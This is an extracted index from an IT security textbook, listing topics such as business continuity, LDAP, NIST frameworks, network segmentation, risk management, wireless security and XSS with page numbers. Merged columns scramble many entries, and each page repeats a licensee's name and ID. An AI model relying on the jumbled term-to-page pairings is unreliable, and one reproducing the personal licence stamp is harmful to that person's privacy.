Authority to Operate (ATO), 39, blockchain BYOD (bring your own device),
G-2 defined, 153, G-2 172, G-2
automation. see also security diagram of, 154 bytecode vs. machine code,
information and event distributed consensus, 154 296
management (SIEM); security secure multi-party
orchestration, automation, and computation (MPC), 154 C
response (SOAR) Blue Coat, 198
C (country), 84
in cloud environments, 93 BlueBorne attack, 168
C&A (certification and
public key infrastructure Bluetooth
accreditation), 39, G-2
(PKI) used with, 234 defined, 168
CA (certificate authority), 231,
autoscaling, in cloud firmware over-the-air using,
237, 243–244, G-2
environment, 92, 92 165
CA/Browser forum, 239
A-V (antivirus), 67, 75, 186, 279, wireless eavesdropping
cache, 87–88, 324, G-2
313, G-1 using, 174
caching engine, 67, G-2
AV (Asset Value), 3 bootloader security, 177
California Consumer Protection
availability, 15, G-2 bootstrapping, in cloud
Act (CCPA), 38
availability zone, 81, G-2 environment, 92
CAN bus (controller area
avoidance of risk, 5 border gateway protocol (BGP),
network bus), 203, G-3
AWS. see Amazon Web Service G-2
Capability Maturity Model
Boston Dynamics robotics, 157
Integration (CMMI), 37
B bring your own device (BYOD),
Carnegie Mellon Software
172, G-2
bare metal virtual platform, 90 Engineering Institute
browser extensions, 295
Basic Input/Output System secure coding standards, 98
buffer overflow, 287, G-2
(BIOS), 184, G-2 secure design patterns, 99
Business Continuity and
BCDR. see Business Continuity CASB (cloud access security
Disaster Recovery (BCDR)
and Disaster Recovery broker), 198, G-2
Business Continuity Plan
BCP (Business Continuity Plan), CBC (Cipher Block Chaining),
(BCP), 48–49
48–49 212
Business Impact Analysis
Bcrypt key stretching method, CC (Common Criteria), 39,
(BIA), 49–51
225 G-3
for cloud platforms,
behavior-based NIDS, 72 CCE (Common Configuration
192–193
BeyondTrust, 121 Enumeration), 264, 265
defined, 47, 48–49
BGP (border gateway protocol), CCMP (Cipher Block Chaining
disaster recovery plan,
G-2 Message Authentication Code
48–49, 53–56
BGP/route hijacking, 303 Protocol), 166
recovery objectives for,
BIA. see Business Impact CCPA (California Consumer
50–51
Analysis Protection Act), 38
testing and readiness for,
big data, 156 CD (Continuous Delivery), 116,
58–60
binary analysis tools, 326–328 116
Business Continuity Plan (BCP),
binwalk tool, 328–329 CDN (Content Delivery
48–49
BIOS (Basic Input/Output Network), 87–88, 88, G-3
business impact. see impact
System), 184, G-2 CDS (Cross Domain Solutions),
Business Impact Analysis (BIA)
bit splitting, 194, G-2 83
defined, 49
BitLocker, 232 cells, with application
information systems,
black box techniques, 155 virtualization, 143
analyzing, 49
Blackhole Routing, 66, G-2
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-4 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-5
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-6 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-7
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-8 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-9
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-10 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-11
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-12 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-13
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-14 | Index
job rotation, 16, G-7 LDAPS (Lightweight Directory Lightweight Directory Access
JSON (JavaScript Object Access Protocol Secure), 125, Protocol (LDAP), 83–84, 125,
Notation) Web Token (JWT), G-8 G-8
129, G-7 ldd tool, 327 Lightweight Directory Access
JSON/REST, 295 leadership, role in BCDR, 59 Protocol Secure (LDAPS), 125,
jump box, 80 leak prevention. see data loss G-8
(leak) prevention (DLP) likelihood of risk, 3, G-8
K least privilege, 17, G-8 Linux Security Module (LSM),
ledger database, 151 183
KDC (key distribution center),
legal considerations. see also live collection tools, 331–333
G-7
governance and compliance live VM migration, vulnerability
Keccack algorithm, 209
contracts and agreements from, 94
KEK (Key Enrollment Key)
enforceability of, 43 LLR (lessons learned report),
database, 185
interconnection security G-8
Kerberos, 126, 234, G-7
agreement (ISA), 44 load balancer, 64–65, G-8
key agreement, 216
master service location services, 170
key distribution center (KDC),
agreement (MSA), 43 logistics sector, ICS/SCADA use
G-7
memorandum of by, 204
key distribution problem, 210
understanding (MOU), Logjam attack, 216, 218, 219
Key Enrollment Key (KEK)
44 logs
database, 185
non-disclosure for cloud platforms,
key exchange, 215–216
agreement (NDA), 43 195–197
key management system (KMS)
operational level defined, 305, G-8
patterns, 193–194
agreement (OLA), 44 NetFlow, 308–309
key performance indicator
Privacy Level Agreement operating system and
(KPI)
(PLA), 44 network logs, 307–308
availability, 15, G-2
Service Level Agreement packet capture (PCAP),
defined, 13, 14, G-7
(SLA), 44 305–307
reliability, 15, G-10
development of new laws, LSM (Linux Security Module),
scalability, 15, G-11
41 183
key risk indicator (KRI), 13, 14,
due care and due diligence, lsof tool, 332
14, G-7
42
key signing key, 70, G-7
key stretching, 225, G-7
e-Discovery, 42 M
encryption laws, 43
key-value database, 150 M2M (Machine to Machine)
export controls, 43
KMS (key management system) communication, 200
legal holds, 42
patterns, 194 MAC (Mandatory Access
legal jurisdiction, 41–42
known vulnerabilities. see Control), 123, G-8
Wassenaar Arrangement,
vulnerabilities MAC (message authentication
43
KPI. see key performance code), 210, G-8
legal hold, G-8
indicator MAC address spoofing, 73
legislation, G-8
KRI (key risk indicator), 13, 14, machine code vs. bytecode,
lessons learned report (LLR),
14, G-7 296
G-8
machine learning (ML), 154,
libraries. see also dependency
L management
G-8
Machine to Machine (M2M)
L2TP/IPSec protocol, 70 dynamically linked libraries,
communication, 200
Ladder Logic language, 202 331
mail security, 66
LDAP (Lightweight Directory statically linked libraries,
management of risk. see risk
Access Protocol), 83–84, 125, 331
management
G-8 third-party, validating, 102
management plane, in SDN, 85
LDAP injection, G-7 licensing, of software, 280
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-15
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-16 | Index
token-based access for, 164 network address translation intrusion detection and
mobile site, 54 (NAT), G-9 prevention, 72–74
modbus, 203, G-8 Network Address Translation Network Access Control
ModSecurity, 69, G-8 (NAT) Gateway, 65, 65 (NAC), 71–72
MOU (memorandum of network agents, 133 security information and
understanding), 44 network configurations, event management (SIEM),
MPC (secure multi-party dynamic, 277 75–76
computation), 154, 158, G-11 network design virtual private network
MSA (master service cloud-based network (VPN), 70
agreement), 43 segmentation, 80–81 network traffic analyzer, 271
MS-CHAPv2, 222 defensible, 78 network-based WAF, 69
MTBF (mean time between deperimeterization, 82–83 next generation firewall
failures), 4, G-8 network integration, 83–84 (NGFW), 67
MTTR (mean time to repair/ network segmentation, NFC (near field
replace/recover), 4, G-8 78–80 communication)
multi-cloud, 146, G-9 software-defined defined, 167–168, G-9
Multi-Cloud Key Management networking (SDN), 85 firmware over-the-air using,
System (MCKMS), 194 Zero Trust Architecture 165
multidomain certificate, 238, (ZTA), 81–82 NGFW (next generation
G-9 network integration, 83–84 firewall), 67
multifactor authentication network intrusion detection NIDS (network intrusion
(MFA), 127, 164, G-9 system (NIDS), 72–73 detection system), 72–73
Multi-Purpose Internet Mail network intrusion detection NIDS sensors (network
Extensions (MIME), 67, G-8 system sensors (NIDS sensors), intrusion detection system
multi-tenant cloud, 146, 149 73, G-9 sensors), 73, G-9
MX record, 66, G-9 network intrusion detection NIDS server (network intrusion
system server (NIDS server), detection system server), 73,
N 72, G-9 G-9
network intrusion prevention NIPS (network intrusion
NAC (network access control),
system (NIPS), 73–74, G-9 prevention system), 73–74, G-9
71–72, 164, 234, G-9
network mapper (nmap), NIST (National Institute of
NAC Lists (NACLs), 81
329–330 Standards and Technology)
NACLs (NAC Lists), 81
network segmentation Cloud Computing Reference
NAT (network address
access control list (ACL), 79 Architecture, 21
translation), G-9
air gap, 80 Cybersecurity Framework
NAT Gateway, 65, 65
defined, 78 (CSF), 8–9, 12–13, 12, 35
National Institute of Standards
guest environment, 79 defined, 35–36
and Technology. see NIST
jump box, 80 FIPS 199, 35
nation-state actors, 257–258
peer-to-peer network (P2P), forensic tools, 323
NDA (non-disclosure
80 NISTIR 7956, 194
agreement), 43
screened subnet, 78–79 password policy guidance,
near field communication
staging environment, 79 121
(NFC)
with vendors, 26 policy on hash functions,
defined, 167–168, G-9
network services 210
firmware over-the-air using,
activity and traffic sensors, Risk Management
165
74–75 Framework (RMF), 9, 35
netcat tool, 332
application layer SP 800 series, 35
Netflix, 194
protections, 66–69 SP 800-34 Rev-1, 48
Netflow, 75, G-9
Domain Name System SP 800-53, 35
netstat tool, 332
Security Extensions SP 800-61, 55
network access control (NAC),
(DNSSEC), 69–70 SP 800-84, 56
71–72, 164, 234, G-9
edge services, 64–66 SP 800-207, 82
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-17
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-18 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-19
Total Cost of Ownership redundant array of reverse proxy, 68, 68, 198
(TCO), 3 independent/inexpensive disks reversible encryption, 121
quantum bits (qubits), 157 (RAID), G-10 review phase, 11
quantum computing, 157–158 redundant hardware, 187 revoked signature database
quarantine action, for data, references, insecure, 288–289 (dbx), 185
134 Referrer-Policy, 118 RFID (radio frequency ID), 167
quarantine network, 71 regions, 81 RIPEMD (RACE Integrity
qubits (quantum bits), 157 registration authority (RA), 237 Primitives Evaluation Message
regression testing, 113, G-10 Digest), 209
R regulations, relationship to risk
standards, 35 assessing. see risk
RA (registration authority), 237
regulatory environment. see assessment
race conditions, 286
governance and compliance defined, G-11
RACE Integrity Primitives
relational database, 150 impact of. see impact
Evaluation Message Digest
reliability, 15, G-10 inherent, 5
(RIPEMD), 209
relying party (RP), 84 likelihood of, 3
radio frequency ID (RFID), 167
Remote Authentication Dial- management of. see risk
RADIUS (Remote
In User Service (RADIUS), 124, management
Authentication Dial-In User
G-10 measuring, 3
Service), 124, G-10
remote code execution (RCE), residual, 6
RAID (redundant array of
G-10 responses to. see risk
independent/inexpensive
Remote Desktop Protocol responses
disks), G-10
(RDP), blocking, 135 tracking, 13–15
rate limiting
remote wipe, 166, G-10 risk acceptance, G-11
DDoS protection provided
remote work, risk appetite, 6, 15, G-11
by, 66
deperimeterization for, 82 risk assessment. see also risk
defined, G-10
replication of data, 89 qualitative risk analysis, 4
raw zone, 81
representation state transfer quantitative risk analysis,
RBAC (role-based access
(REST), G-10 3–4
control), 123, G-11
residual risk, 6, G-11 of vendors, 19–25
RBAC (rule-based access
resiliency risk avoidance, G-11
control), 124, G-11
clustering for, 89 risk exceptions, 6
RC4, 211
course of action risk frameworks
RCE (remote code execution),
orchestration, 89 Committee of Sponsoring
G-10
data replication for, 89 Organizations (COSO), 10
RDP (Remote Desktop
distributed allocation for, Control Objectives for
Protocol), blocking, 135
89 Information and Related
readelf tool, 327
diversity/heterogeneity for, Technologies (COBIT), 9–10
real-time operating system
88 defined, 8
(RTOS), 165
of durable infrastructures, ISO 31000 (31k), 9
recover function of NIST CSF,
88–89 NIST CSF (Cybersecurity
13
Resource Record Set (RRset), Framework), 8–9, 12–13
recovery objectives, 50–51, 50
70, G-11 NIST RMF (Risk
recovery plan, disaster. see
respond function of NIST CSF, Management Framework),
disaster recovery plan
13 9
recovery point objective (RPO),
REST (representation state risk management
50
transfer), G-10 assessing risk. see risk
recovery service level, 51
restricted Virtual Desktop assessment
recovery time objective (RTO),
Infrastructure (VDI), 135 controls for. see controls
50
return on investment (ROI), 4, defined, 2, 8, G-11
G-11 frameworks for. see risk
reverse engineering, 268 frameworks
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-20 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-21
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-22 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-23
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-24 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-25
VPC. see virtual private cloud HTTP Strict Transport remote wipe and, 166
VPN (virtual private network), Security (HSTS), 247 tethering, 168
70, 170, 232 web-based VPN, 170 vulnerability scans for, 269
vulnerabilities. see risk; threat WEP and Wi-Fi Protected wireless eavesdropping
and vulnerability management Access (WPA/WPA2), 166 using, 174
vulnerability scanning white box attack, 155 wireless personal area network
software, 261–262, 272 wide-column database, 151 (WPAN), 168
WIDS (wireless intrusion wireless vulnerability scans,
W detection system), 73, G-14 269
Wi-Fi (wireless networks) Wireshark, 332–333, G-14
WAF (web application firewall),
Aircrack-ng for, 330 WPAN (wireless personal area
69, G-14
deperimeterization and, 83 network), 168
walk-through, for simulation
firmware over-the-air using, WPA/WPA2 (WEP and Wi-Fi
tests, 60
165 Protected Access), 166
wallet apps, 167
remote wipe and, 166
warm site, 54, G-14
waterfall model, 114, G-14
tethering, 168 X
vulnerability scans for, 269
watermarking, 136 XCCDF (Extensible
wireless eavesdropping
Watson computer, 156–157 Configuration Checklist
using, 174
weak ciphers, 289–290 Description Format), 263, 265
Wi-Fi 6, 166–167
wearable devices, 174, 201 X-Content-Type-Options, 117
Wi-Fi Enhanced Open, 166–167
web application firewall (WAF), XFO (X-Frame-Options), 117
Wi-Fi Protected Access 3
66, 69, G-14 X-Frame-Options (XFO), 117
(WPA3), 166–167
web application security XML (eXtensible markup
wildcard certificates, 240
HTTP response headers, language), G-5
Windows AppLocker, 186–187
security options in, 117–118 XML (eXtensible markup
Windows Credential Manager,
mitigating vulnerabilities in language) gateway, 69
121
broken authentication, X-Permitted-Cross-Domain
Windows Server
287–288 Policies, 118
App-V, 90
improper headers, XSRF (cross-site request
certificate services, 237
290–291 forgery), 69, 298, G-3
Wine emulator, 145
insecure references, XSS (cross-site scripting), 69,
WIPS (wireless intrusion
288–289 297–298, G-3
prevention system), 74, G-14
weak ciphers, 289–290
WireGuard protocol, 70
Open Web Application
wireless eavesdropping, 174 Z
Security Project (OWASP),
wireless intrusion detection Zero Trust Architecture (ZTA),
117, 118
system (WIDS), 73, G-14 81–82
web development frameworks,
wireless intrusion prevention zone signing key, 70, G-14
98
system (WIPS), 74, G-14 ZTA (Zero Trust Architecture),
web filtering, 67
wireless networks (Wi-Fi) 81–82
web server technologies, 98
Aircrack-ng for, 330
web traffic protections
deperimeterization and, 83
certificate pinning, 247
firmware over-the-air using,
certificate stapling, 247
165
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024